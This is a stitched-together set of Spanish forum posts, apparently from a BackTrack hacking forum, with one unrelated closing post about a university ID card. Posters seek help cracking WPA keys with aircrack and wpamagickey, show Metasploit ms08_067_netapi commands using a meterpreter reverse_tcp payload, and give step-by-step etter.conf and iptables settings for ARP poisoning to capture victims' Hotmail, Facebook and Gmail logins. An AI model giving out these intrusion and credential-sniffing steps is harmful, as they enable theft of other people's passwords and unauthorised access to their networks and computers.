Muchas gracias por contestar beholdthe, acabo de repetir el ataque; he cogido el diccionario que me ha dado wpamagickey y le he incorporado la contraseña del router y si que me la ha sacado el aircrack. Ahora me hace dudar que la contraseña de mi router tiene las letras en mayúsculas mientras que las del diccionario están en minúsculas.
El wpamagickey es entonces una herramienta obsoleta?

Lo del handshake corrupto que he leído en otros foros, si no es por el movil, a qué se refiere?, ya que si ( tal y como lo he entendido yo ) capturo un handshake corrupto, aunque tenga la contraseña en el diccionario, no la identificaría no?
Como se puede solucionar esto?

Por otro lado con respecto al router, me equivoqué no es Comtrend, el modelo es este: Zyxel home station vdsl2 p870hnu-51b, he leído que también puede dar problemas con la alfa awus036h rtl8187l, que es la tarjeta que uso. Si quieres luego hago una captura de pantalla en el Backtrack y te lo enseño.

Muchas gracias!

Hola, buenas a todos
Resulta que el aircrack me dice que la contraseña no se encuentra en el diccionario generado por wpamagickey para mi red WLAN_XXXX. No se por que puede ser, quizás porque el handshake este corrupto según he leído en algún sitio, ¿como puedo conseguir un handshake autentico?
Mi router es del año 2013 de Movistar y marca Comtrend.
Puede ser porque tengo mi movil conectado a la red?

PD: Es mejor el método de wps para acceder a este tipo de redes?

Muchas gracias y perdón si el tema esta resuelto pero no lo he encontrado en el buscador del foro ni en google.

No consigo una sesion meterpreter usando el exploit windows smb ms08_067_netapi, he intentado con algunos otros pero nada, alguien me puede decir como consigo una??, el ordenador al que intento acceder tiene sistema operativo windows 7, aunque le quite el antivirus y el firewall no consigo ninguna sesion!! ayuda por favor!

Nota: uso la suite de Backtrack 4
Tambien he intentado con el autopwn de FastTrack y nada

Otra dudas:
1- Cuando hago el analisis de vulnerabilidadees con nmap, me salen los puertos abiertos, a partir de ahi, como sé los bugs, y de saberlos como se que exploit usar?

2- Que formas hay de conseguir sesiones meterpreter?

3- Un exploit sirve solo para conseguir una sesion meterpreter?

PD: Perdonad si mis dudas son muy basicas pero he intentado leer lo mas posible y no he encontrado solucion a mis respuestas

Muchas gracias

Tengo el livecd de backtrack 4 R1 y cuando lanzo desde msf (version 3.3 creo) el exploit windows smb ms08_067_netapi  al puerto 445 y con el payload reverse_tcp me pone que lo ha explotado correctamente pero sin ninguna sesion de meterpreter... lo he estado buscando en muchisimos foros y hay bastante gente que tiene el mismo problema que yo pero no he encontrado una respuesta... ayuda por favor!

(Nota: el autopwn y el fasttrack tampoco me funcionan me sale lo de "waiting on # modules to finish execution")

Los comandos que utilizo son los siguientes:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


msf exploit(ms08_067_netapi) > show options ------> configuro RHOST en el exploit y LHOST en el payload

msf exploit(ms08_067_netapi) > exploit

• Started reverse handler on 192.168.1.2:4444
• Automatically detecting the target...
• Fingerprint: Windows XP Service Pack 2 - lang:Spanish
• Selected Target: Windows XP SP2 Spanish (NX)
• Triggering the vulnerability...
• Exploit completed, but no session was created.

Siscu.cab yo tambien uso backtrack, a que te refieres con que no detecta nada? contraseñas? prueba a darle a view-- connections y ahi puedes comprobar si de verdad no te detecta los paquetes.

para capturar contraseñas solo tienes que hacer arp poisoning, lo dejas funcionar y las va mostrando en la pantalla de abajo cuando la victima se logea en una pagina web

si no tienes el etter.conf configurado para que acepte ssl no capturara las contraseñas de paginas que utilicen este certificado como facebook,hotmail,
,gmail... sino que capturara las contraseñas que se pasen en texto plano

para configurar ettercap tienes que abrir el archivo /etc/etter.conf una vez abierto te saldra un texto en el que tienes que sustituir donde pone:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

por:

redir_command_on= "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


redir_command_off = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

y donde pone:

 ec_uid = numeroquenomeacuerdo
 ec_gid = numeroquenomeacuerdo

por:

 ec_uid = 0
 ec_gid = 0

y guardas el archivo

despues inicias ettercap otra vez y deberia funcionar prueba si tienes otro ordenador, te metes en hotmail y te saldra la contraseña y el username en el ettercap!!


te dejo unos videos:

http://www.youtube.com/watch?v=hmXJXCiMoCU

http://www.youtube.com/watch?v=ESGV9zlo0Zo&feature=related

lo he intentado hacer lo mas sencillo posible si tienes alguna duda dimelo!

dazoverride gracias tio! no lo habia pensado! es un poco lio pero seguro que funciona, si encuentro alguna solucion mas rapida te la hare saber
un abrazo!

Pues donde pone ec_uid y ec_gid sustituyo los valores por 0
y descomento los dos redir_command:

#redir_command_on/off = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Buenas, por que cuando hago arp poisoning (habiendo modificado el /etc/etter.conf para que acepte ssl) no me captura la contraseña del tuenti?
me sale lo de aceptar el certificado pero no me captura ni el login ni la contraseña en el ettercap
En cambio me funciona perfectamente para facebook, gmail, hotmail y youtube...

Por cierto, por que no me detecta la password cuando hago el login en esta pagina!?? solo me salen asteriscos!!!!!!

Gracias!

venga en serio no hay ninguna solucion!!? lo de snifar con el ettercap!? ayuda porfavooooooorr

jaja eso digo yo, a mi me dieron el carnet provisional el año pasado en primer curso, habia que pedir el carnet de universitario y me dijeron que tardarian de dos a tres meses, fui a los tres meses y no lo habian recibido... como no me conectaba mucho a internet en la uni lo deje pasar hasta este año que tengo que enviar trabajos y quiero hacerlo por la red de la uni por eso pedi reclamacion la semana pasada... Ah por cierto! es la E.T.S.I. Caminos de la Politecnica de Madrid